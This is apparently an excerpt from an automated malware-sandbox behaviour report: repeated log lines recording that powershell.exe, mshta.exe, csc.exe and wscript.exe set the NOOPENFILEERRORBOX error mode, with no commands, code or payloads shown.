Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
